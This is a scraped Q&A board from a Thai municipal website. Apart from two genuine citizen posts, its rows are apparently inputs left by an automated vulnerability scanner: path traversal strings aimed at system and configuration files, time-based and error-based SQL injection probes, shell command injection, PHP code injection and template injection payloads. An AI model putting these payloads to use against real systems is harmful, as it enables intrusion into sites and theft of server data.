:
ยินดีต้อนรับเข้าสู่เทศบาลตำบลทากาศ // วิสัยทัศน์ : ทากาศเมืองร่มรื่นน่าอยู่ คู่คุณภาพชีวิตที่ดี ประเพณีงาม การคมนาคมสะดวก // ติดต่อสอบถาม : หมายเลขโทรศัพท์ 053-096008 หมายเลขโทรสาร(FAX อัตโนมัติ) 053-096009 อีเมล์ : saraban@thakat.go.th

Q&A

หัวข้อ ผู้ตั้งกระทู้ ตอบ
123456 123456 0
123456 123456 0
../../../../../../etc/passwd 123456 0
123456 123456 0
123456 123456 0
../../../../../../etc/passwd123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd 123456 0
123456 123456 0
123456 123456 0
%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u0 123456 0
123456 123456 0
123456 123456'"\( 0
../../../../../../../../../../../../../../../../../../etc/passwd 123456 0
123456 123456 0
123456 123456 0
../../../../../../../../../../../../../../../../../../etc/passwd123456 123456 0
123456 123456 0
123456 123456 0
./../../../../../../../../../../../../../../../../../../etc/passwd 123456 0
123456 123456/**/and/**/0=DBMS_PIPE.RECEIVE_MESSAGE('t',2) 0
123456 123456/**/and/**/cast(md5('1040685624')as/**/int)>0 0
123456 123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('g',0)='g 0
123456 convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1702002751'))) 0
123456 123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('s',2)='s 0
123456 123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1518707805')))>'0 0
123456 123456鎈'"\( 0
123456 123456'and(select+1)>0waitfor/**/delay'0:0:0 0
123456 123456"and/**/extractvalue(1,concat(char(126),md5(1025897023)))and" 0
123456 123456'and(select+1)>0waitfor/**/delay'0:0:2 0
123456 extractvalue(1,concat(char(126),md5(1296297196))) 0
123456 123456/**/and/**/2=DBMS_PIPE.RECEIVE_MESSAGE('u',0) 0
123456 123456'and(select'1'from/**/cast(md5(1854341252)as/**/int))>'0 0
123456 123456 0
123456 123456/**/and(select+1/**/from/**/pg_sleep(2))>0/**/ 0
123456 123456 0
123456 123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0 0
123456 123456'/**/and(select'1'from/**/pg_sleep(2))::text>'0 0
123456 123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/ 0
123456 123456/**/and(select+1)>0waitfor/**/delay'0:0:2'/**/ 0
123456 123456'and/**/extractvalue(1,concat(char(126),md5(1462908897)))and' 0
123456'"\( 123456 0
123456 123456'and(select*from(select+sleep(2))a/**/union/**/select+1)=' 0
123456 123456 0
123456 123456"and(select*from(select+sleep(0))a/**/union/**/select+1)=" 0
123456 123456 0
123456 123456 0
123456 123456"and(select*from(select+sleep(2))a/**/union/**/select+1)=" 0
123456 123456 0
123456 123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/ 0
123456 (select*from(select+sleep(0)union/**/select+1)a) 0
123456 123456 0
123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1132703003')))>'0 123456 0
123456 (select*from(select+sleep(2)union/**/select+1)a) 0
123456 123456 0
123456鎈'"\( 123456 0
123456 123456'and(select*from(select+sleep(0))a/**/union/**/select+1)=' 0
123456 123456 0
123456 123456 0
123456 123456 0
123456'and(select'1'from/**/cast(md5(1331232837)as/**/int))>'0 123456 0
123456 123456 0
123456 123456 0
123456/**/and/**/cast(md5('1790432415')as/**/int)>0 123456 0
123456 123456 0
123456 123456 0
convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1098928359'))) 123456 0
123456 123456'and'h'='h 0
123456 123456 0
123456 123456'and'y'='m 0
123456'and/**/extractvalue(1,concat(char(126),md5(1321271812)))and' 123456 0
123456 123456"and"s"="s 0
123456"and/**/extractvalue(1,concat(char(126),md5(1036732412)))and" 123456 0
123456 123456"and"i"="o 0
extractvalue(1,concat(char(126),md5(1489837169))) 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456/**/and+3=3 0
123456 123456 0
123456 123456/**/and+3=7 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
ขอซ่อมไฟกิ่ง วิจิตร 1
กีฬาประชาชน ประชาชนซอย 32 1
123456 123456 0
./../../../../../../etc/passwd 123456 0
123456 123456 0
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd 123456 0
123456 123456 0
123456 123456 0
%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215etc%u2215passwd 123456 0
123456 123456 0
/etc/passwd 123456 0
123456 123456 0
/etc/passwd123456 123456 0
123456 123456 0
%2fetc%2fpasswd 123456 0
123456 123456 0
%u2215etc%u2215passwd 123456 0
123456 123456 0
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 123456 0
123456 123456 0
.\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 123456 0
123456 123456 0
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini123456 123456 0
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin%2eini 123456 0
123456 123456 0
123456 123456 0
%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u0 123456 0
123456 123456 0
..\..\..\..\..\..\Windows\win.ini 123456 0
123456 123456 0
.\..\..\..\..\..\..\Windows\win.ini 123456 0
123456 123456 0
..\..\..\..\..\..\Windows\win.ini123456 123456 0
123456 123456 0
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin%2eini 123456 0
123456 123456 0
%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216Windows%u2216win%u002eini 123456 0
../../../../../../../../../../../../../../../../../../Windows/win.ini 123456 0
123456 123456 0
./../../../../../../../../../../../../../../../../../../Windows/win.ini 123456 0
123456/**/and+2=2 123456 0
../../../../../../../../../../../../../../../../../../Windows/win.ini123456 123456 0
123456/**/and+1=8 123456 0
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fWindows%2fwin%2eini 123456 0
123456'and'g'='g 123456 0
%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u0 123456 0
123456'and'o'='b 123456 0
../../../../../../Windows/win.ini 123456 0
123456"and"s"="s 123456 0
./../../../../../../Windows/win.ini 123456 0
123456"and"p"="v 123456 0
../../../../../../Windows/win.ini123456 123456 0
(select*from(select+sleep(0)union/**/select+1)a) 123456 0
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fWindows%2fwin%2eini 123456 0
(select*from(select+sleep(2)union/**/select+1)a) 123456 0
%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215Windows%u2215win%u002eini 123456 0
123456'and(select*from(select+sleep(0))a/**/union/**/select+1)=' 123456 0
WEB-INF/web.xml 123456 0
123456'and(select*from(select+sleep(2))a/**/union/**/select+1)=' 123456 0
WEB-INF/web.xml;123456 123456 0
123456"and(select*from(select+sleep(0))a/**/union/**/select+1)=" 123456 0
../WEB-INF/web.xml 123456 0
123456"and(select*from(select+sleep(2))a/**/union/**/select+1)=" 123456 0
../WEB-INF/web.xml;123456 123456 0
../../WEB-INF/web.xml 123456 0
123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/ 123456 0
../../WEB-INF/web.xml;123456 123456 0
123456/**/and(select+1/**/from/**/pg_sleep(2))>0/**/ 123456 0
123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0 123456 0
../../../WEB-INF/web.xml 123456 0
../../../WEB-INF/web.xml;123456 123456 0
123456'/**/and(select'1'from/**/pg_sleep(2))::text>'0 123456 0
../../../../WEB-INF/web.xml 123456 0
123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/ 123456 0
../../../../WEB-INF/web.xml;123456 123456 0
123456/**/and(select+1)>0waitfor/**/delay'0:0:2'/**/ 123456 0
123456'and(select+1)>0waitfor/**/delay'0:0:0 123456 0
123456'and(select+1)>0waitfor/**/delay'0:0:2 123456 0
123456/**/and/**/2=DBMS_PIPE.RECEIVE_MESSAGE('p',0) 123456 0
123456/**/and/**/1=DBMS_PIPE.RECEIVE_MESSAGE('l',2) 123456 0
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('r',0)='r 123456 0
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('u',2)='u 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 expr 865781264 + 862471613 123456 0
123456|expr 989539702 + 971388272 123456 0
123456$(expr 966782955 + 912429909) 123456 0
123456&set /A 843692175+959916883 123456 0
expr 854924467 + 818717374 123456 0
${@var_dump(md5(973769687))}; 123456 0
'-var_dump(md5(955481546))-' 123456 0
123456 123456 expr 815214690 + 826446002 0
123456 123456|expr 807441020 + 802178441 0
123456 ${@var_dump(md5(220663885))}; 0
123456 123456$(expr 800029978 + 888305094) 0
123456 '-var_dump(md5(848259520))-' 0
123456 123456&set /A 830920830+902207079 0
123456 123456 0
123456 expr 828893781 + 925366534 0
123456 123456 0
123456 123456 0
123456 '+(42548*41783)+' 0
123456 123456 0
123456 123456 0
${984926974+812882132} 123456 0
123456 123456 0
'+(40696*41686)+' 123456 0
123456 123456 0
123456 123456 0
123456 ${990347343+967320449} 0
/*1*/{{870296509+903049241}} 123456 0
123456 123456 0
123456 pjwuanporrzxehjbyjox 0
${912609643+970115804} 123456 0
123456 123456 0
${(895449091+846037243)?c} 123456 0
#set($c=832432261+951709539)${c}$c 123456 0
pjwuanporrzxehjbyjox 123456 0
<%- 970532150+900300868 %> 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 /*1*/{{805675447+958481126}} 0
123456 123456 0
123456 123456 0
123456 ${892537338+856535160} 0
123456 123456 0
123456 ${(910206686+880352412)?c} 0
123456 123456 0
123456 #set($c=897064872+986224671)${c}$c 0
123456 123456 0
123456 <%- 984314413+981273354 %> 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456'and/**/extractvalue(1,concat(char(126),md5(1043006928)))and' 123456 0
123456 123456 0
123456 123456 0
123456"and/**/extractvalue(1,concat(char(126),md5(1106095540)))and" 123456 0
123456 123456 0
extractvalue(1,concat(char(126),md5(1459605055))) 123456 0
123456 123456 0
123456 123456 0
123456'and(select'1'from/**/cast(md5(1650016002)as/**/int))>'0 123456 0
123456 123456 0
123456 123456 0
123456/**/and/**/cast(md5('1604686708')as/**/int)>0 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1936501508'))) 123456 0
123456 123456 0
123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1731291765')))>'0 123456 0
123456 123456 0
123456 123456 0
123456鎈'"\( 123456 0
123456 123456 0
123456 123456 0
123456'"\( 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456'and/**/extractvalue(1,concat(char(126),md5(1949838372)))and' 0
123456 123456 0
123456 123456"and/**/extractvalue(1,concat(char(126),md5(1491479832)))and" 0
123456 123456 0
123456 extractvalue(1,concat(char(126),md5(1688673867))) 0
123456 123456 0
123456 123456'and(select'1'from/**/cast(md5(1319110266)as/**/int))>'0 0
123456 123456/**/and/**/cast(md5('1393347756')as/**/int)>0 0
123456 123456 0
123456 convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1385239996'))) 0
123456 123456 0
123456 123456 0
123456 123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1085144882')))>'0 0
123456 123456 0
123456 123456 0
123456 123456鎈'"\( 0
123456 123456 0
123456 123456 0
123456 123456 0
123456/**/and+1=1 123456 0
123456 123456'"\( 0
123456 123456 0
123456/**/and+4=6 123456 0
123456 123456 0
123456'and'f'='f 123456 0
123456 123456 0
123456'and'g'='q 123456 0
123456 123456 0
../../../../../../../../../../../../../../../../../../etc/passwd 123456 0
123456"and"n"="n 123456 0
123456 123456 0
../../../../../../../../../../../../../../../../../../etc/passwd123456 123456 0
123456"and"z"="v 123456 0
./../../../../../../../../../../../../../../../../../../etc/passwd 123456 0
(select*from(select+sleep(0)union/**/select+1)a) 123456 0
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd 123456 0
(select*from(select+sleep(2)union/**/select+1)a) 123456 0
%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u0 123456 0
123456'and(select*from(select+sleep(0))a/**/union/**/select+1)=' 123456 0
../../../../../../etc/passwd 123456 0
123456'and(select*from(select+sleep(2))a/**/union/**/select+1)=' 123456 0
../../../../../../etc/passwd123456 123456 0
123456"and(select*from(select+sleep(0))a/**/union/**/select+1)=" 123456 0
./../../../../../../etc/passwd 123456 0
123456"and(select*from(select+sleep(2))a/**/union/**/select+1)=" 123456 0
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd 123456 0
123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/ 123456 0
%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215etc%u2215passwd 123456 0
/etc/passwd 123456 0
123456/**/and(select+1/**/from/**/pg_sleep(2))>0/**/ 123456 0
123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0 123456 0
/etc/passwd123456 123456 0
123456'/**/and(select'1'from/**/pg_sleep(2))::text>'0 123456 0
%2fetc%2fpasswd 123456 0
123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/ 123456 0
%u2215etc%u2215passwd 123456 0
123456/**/and(select+1)>0waitfor/**/delay'0:0:2'/**/ 123456 0
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 123456 0
123456'and(select+1)>0waitfor/**/delay'0:0:0 123456 0
.\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 123456 0
123456'and(select+1)>0waitfor/**/delay'0:0:2 123456 0
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini123456 123456 0
123456/**/and/**/2=DBMS_PIPE.RECEIVE_MESSAGE('a',0) 123456 0
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin%2eini 123456 0
%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u0 123456 0
123456/**/and/**/0=DBMS_PIPE.RECEIVE_MESSAGE('n',2) 123456 0
..\..\..\..\..\..\Windows\win.ini 123456 0
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('m',0)='m 123456 0
.\..\..\..\..\..\..\Windows\win.ini 123456 0
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('i',2)='i 123456 0
..\..\..\..\..\..\Windows\win.ini123456 123456 0
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin%2eini 123456 0
%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216Windows%u2216win%u002eini 123456 0
../../../../../../../../../../../../../../../../../../Windows/win.ini 123456 0
./../../../../../../../../../../../../../../../../../../Windows/win.ini 123456 0
../../../../../../../../../../../../../../../../../../Windows/win.ini123456 123456 0
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fWindows%2fwin%2eini 123456 0
%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u0 123456 0
../../../../../../Windows/win.ini 123456 0
./../../../../../../Windows/win.ini 123456 0
../../../../../../Windows/win.ini123456 123456 0
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fWindows%2fwin%2eini 123456 0
123456 123456/**/and+2=2 0
%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215Windows%u2215win%u002eini 123456 0
123456 123456/**/and+0=6 0
WEB-INF/web.xml 123456 0
123456 123456'and'z'='z 0
WEB-INF/web.xml;123456 123456 0
123456 123456'and'v'='i 0
../WEB-INF/web.xml 123456 0
123456 123456"and"h"="h 0
../WEB-INF/web.xml;123456 123456 0
123456 123456"and"r"="l 0
../../WEB-INF/web.xml 123456 0
123456 (select*from(select+sleep(0)union/**/select+1)a) 0
../../WEB-INF/web.xml;123456 123456 0
123456 (select*from(select+sleep(2)union/**/select+1)a) 0
../../../WEB-INF/web.xml 123456 0
123456 123456'and(select*from(select+sleep(0))a/**/union/**/select+1)=' 0
../../../WEB-INF/web.xml;123456 123456 0
123456 123456'and(select*from(select+sleep(2))a/**/union/**/select+1)=' 0
../../../../WEB-INF/web.xml 123456 0
123456 123456"and(select*from(select+sleep(0))a/**/union/**/select+1)=" 0
../../../../WEB-INF/web.xml;123456 123456 0
123456 123456"and(select*from(select+sleep(2))a/**/union/**/select+1)=" 0
123456 123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/ 0
123456 123456/**/and(select+1/**/from/**/pg_sleep(2))>0/**/ 0
123456 123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0 0
123456 123456'/**/and(select'1'from/**/pg_sleep(2))::text>'0 0
123456 123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/ 0
123456 123456/**/and(select+1)>0waitfor/**/delay'0:0:2'/**/ 0
123456 123456'and(select+1)>0waitfor/**/delay'0:0:0 0
123456 123456'and(select+1)>0waitfor/**/delay'0:0:2 0
123456 123456/**/and/**/3=DBMS_PIPE.RECEIVE_MESSAGE('k',0) 0
123456 123456/**/and/**/1=DBMS_PIPE.RECEIVE_MESSAGE('x',2) 0
123456 123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('l',0)='l 0
123456 123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('x',2)='x 0
123456 123456 expr 846367565 + 830869573 0
123456 123456|expr 844359656 + 921109248 0
123456 123456$(expr 825985713 + 833249865) 0
123456 123456&set /A 905737463+834678300 0
123456 expr 991036797 + 866951250 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 expr 817445487 + 880933543 123456 0
123456|expr 873348868 + 879582894 123456 0
123456$(expr 943192592 + 928806269) 123456 0
123456&set /A 815519737+868187658 123456 0
expr 992701006 + 974621436 123456 0
123456 123456 0
123456 123456 0
${@var_dump(md5(220483759))}; 123456 0
'-var_dump(md5(982771225))-' 123456 0
123456 ${@var_dump(md5(701465989))}; 0
123456 '-var_dump(md5(181000931))-' 0
123456 123456 0
123456 '+(44023*41985)+' 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 ${946887571+963775633} 0
'+(41390*44275)+' 123456 0
123456 123456 0
123456 123456 0
${841000514+837406364} 123456 0
/*1*/{{958901114+894877593}} 123456 0
${992827264+994324658} 123456 0
123456 cmeztqrfmsnffigvddkh 0
${(810302554+833243751)?c} 123456 0
123456 123456 0
#set($c=856037382+942245279)${c}$c 123456 0
cmeztqrfmsnffigvddkh 123456 0
<%- 856270169+960890309 %> 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 /*1*/{{887637790+972306491}} 0
123456 ${825452231+893712958} 0
123456 ${(907020959+948497423)?c} 0
123456 #set($c=959630035+983517687)${c}$c 0
123456 <%- 955485471+927384224 %> 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0
123456 123456 0